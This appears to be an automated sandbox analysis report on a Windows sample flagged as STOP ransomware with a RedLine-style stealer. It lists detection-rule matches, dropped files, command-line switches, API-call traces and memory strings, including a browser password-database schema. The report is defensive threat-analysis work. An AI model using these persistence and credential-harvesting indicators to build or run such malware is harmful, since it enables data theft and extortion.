                Source: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000006.00000000.1797319331.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000000A.00000000.1910328345.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000003.00000000.1666987231.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000004.00000002.1746887705.0000000000633000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000002.00000000.1666176128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000000A.00000000.1910389769.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000000.1646052192.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000006.00000002.1841955191.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7496, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7596, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7608, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7872, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7256, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, type: DROPPEDMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, type: DROPPEDMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: DROPPEDMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: DROPPEDMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: build2.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: build2[1].exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.rans.spre.troj.spyw.evad.winEXE@12/1265@8/5
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA1900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,0_2_00BA1900
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA2440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,0_2_00BA2440
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,0_2_00B9D240
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].jsonJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --Admin0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: IsAutoStart0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: IsTask0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --ForNetRes0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: IsAutoStart0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: IsTask0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --Task0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --AutoStart0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --Service0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --Admin0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: C:\Windows\0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: D:\Windows\0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: %username%0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: F:\0_2_00BA9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --Admin2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: IsAutoStart2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: IsTask2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --ForNetRes2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: IsAutoStart2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: IsTask2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --Task2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --AutoStart2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --Service2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: X1>2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --Admin2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: x2?2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: x*>2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: C:\Windows\2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: D:\Windows\2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: 7>2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: %username%2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: F:\2_2_002F9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --Admin3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: IsAutoStart3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: IsTask3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --ForNetRes3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: IsAutoStart3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: IsTask3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --Task3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --AutoStart3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --Service3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: --Admin3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: C:\Windows\3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: D:\Windows\3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: %username%3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCommand line argument: F:\3_2_00BA9F90
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCommand line argument: tudizukedi4_2_00441C30
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: build2.exe, 00000005.00000003.1893912536.0000000009937000.00000004.00000020.00020000.00000000.sdmp, FCBAEHCAEGDHJKFHJKFI.5.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeReversingLabs: Detection: 86%
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeVirustotal: Detection: 78%
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeString found in binary or memory: set-addPolicy
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeString found in binary or memory: setct-CertReqTBEXsetct-CertResTBEsetct-CRLNotificationTBSsetct-CRLNotificationResTBSsetct-BCIDistributionTBSsetext-genCryptgeneric cryptogramsetext-miAuthmerchant initiated authsetext-pinSecuresetext-pinAnysetext-track2setext-cvadditional verificationset-policy-rootsetCext-hashedRootsetCext-certTypesetCext-merchDatasetCext-cCertRequiredsetCext-tunnelingsetCext-setExtsetCext-setQualfsetCext-PGWYcapabilitiessetCext-TokenIdentifiersetCext-Track2DatasetCext-TokenTypesetCext-IssuerCapabilitiessetAttr-CertsetAttr-PGWYcappayment gateway capabilitiessetAttr-TokenTypesetAttr-IssCapissuer capabilitiesset-rootKeyThumbset-addPolicysetAttr-Token-EMVsetAttr-Token-B0PrimesetAttr-IssCap-CVMsetAttr-IssCap-T2setAttr-IssCap-SigsetAttr-GenCryptgrmgenerate cryptogramsetAttr-T2Encencrypted track 2setAttr-T2cleartxtcleartext track 2setAttr-TokICCsigICC or token signaturesetAttr-SecDevSigsecure device signatureset-brand-IATA-ATAset-brand-Dinersset-brand-AmericanExpressset-brand-JCBset-brand-Visaset-brand-MasterCardset-brand-NovusDES-CDMFdes-cdmfrsaOAEPEncryptionSETITU-Titu-tJOINT-ISO-ITU-Tjoint-iso-itu-tinternational-organizationsInternational OrganizationsmsSmartcardLoginMicrosoft SmartcardloginmsUPNMicrosoft Universal Principal NameAES-128-CFB1aes-128-cfb1AES-192-CFB1aes-192-cfb1AES-256-CFB1aes-256-cfb1AES-128-CFB8aes-128-cfb8AES-192-CFB8aes-192-cfb8AES-256-CFB8aes-256-cfb8DES-CFB1des-cfb1DES-CFB8des-cfb8DES-EDE3-CFB1des-ede3-cfb1DES-EDE3-CFB8des-ede3-cfb8streetstreetAddresspostalCodeid-pplproxyCertInfoProxy Certificate Informationid-ppl-anyLanguageAny languageid-ppl-inheritAllInherit allnameConstraintsX509v3 Name 